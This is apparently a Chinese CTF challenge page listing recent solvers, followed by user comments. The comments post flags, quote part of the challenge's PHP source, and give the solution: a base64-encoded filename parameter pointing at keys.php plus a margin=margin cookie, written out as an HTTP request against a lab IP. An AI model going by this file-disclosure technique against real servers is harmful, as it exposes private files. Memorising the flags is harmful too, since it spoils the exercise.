评分(10)
解题动态
wzl真帅 攻破了该题 18小时前
13500586839 攻破了该题 18小时前
violetyy 攻破了该题 1天前
cs888 攻破了该题 1天前
124要留就要77 攻破了该题 2天前
奔跑小马 攻破了该题 4天前
vespercc 攻破了该题 4天前
dicce 攻破了该题 4天前
17388110818 攻破了该题 5天前
souljian03 攻破了该题 5天前
zzf0124 攻破了该题 5天前
orange33315 攻破了该题 5天前
SEALBLUE 攻破了该题 5天前
yxyshy 攻破了该题 5天前
142979 攻破了该题 6天前
CULK3Gf0 攻破了该题 6天前
红烧兔2 攻破了该题 6天前
colddog 攻破了该题 6天前
844507082 攻破了该题 6天前
评论
wxy1343 2年前
举报
flag{c999c8a2257cee21c3660e5297f514a3}
C0PYCat 2年前
举报
if (isset($_COOKIE['margin']) && $_COOKIE['margin'] == 'margin') { $file_list[2] = 'keys.php'; }
w登临意 2年前
举报
用hackbar,burpsuite都没有得到flag。最后写了个脚本就有了,好奇怪
YSN97 1年前
举报
可能是因为flag在第1行,而第1行,这个行数的数组下标为0,而不是1。源码是 echo $fa[$line];
行走的五花肉 2年前
举报
@1nuyasha 用完hackbar看下网页源代码
1nuyasha 2年前
举报
还真是,py上脚本出来了。。。 bp和hackbar返回都是空
凶残炒土豆 2年前
举报
flag{84c4486721a624b58151691af7778aba}
moke1 2年前
举报
凡是启动金币大于奖励金币的一律不做
嵌入式学的CTF 2年前
举报
<?php error_reporting(0); $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); $line=isset($_GET['line'])?intval($_GET['line']):0; if($file=='') header("locat
joyoung 2年前
举报
链接推测出filename值为base64加密,改为index.php,将line从0开始,得出源代码审计得出解法,cookie设置margin=margin,line为0,请求后查看响应中包含flag
zmcck 2年前
举报
hackbar: url:http://114.67.175.224:12042/index.php?line=&filename=a2V5cy5waHA= cookie添加 margin=margin 执行后的空白页面,查看源码<!--?php $key="flag{6fd889776a1cbefdd76d72fe89195af5}"; ?-->
Traherne 2年前
举报
hackbar不管用啊,执行之后一片空白,源代码里也什么都没有
Restwlaq 2年前
举报
注意行号必须是空,如果?line=1时,即使hackbar提交了cookie,第二行没有内容也返回空白
zdfy005 2年前
举报
GET /index.php?line=&filename=a2V5cy5waHA= HTTP/1.1 Cookie:margin:margin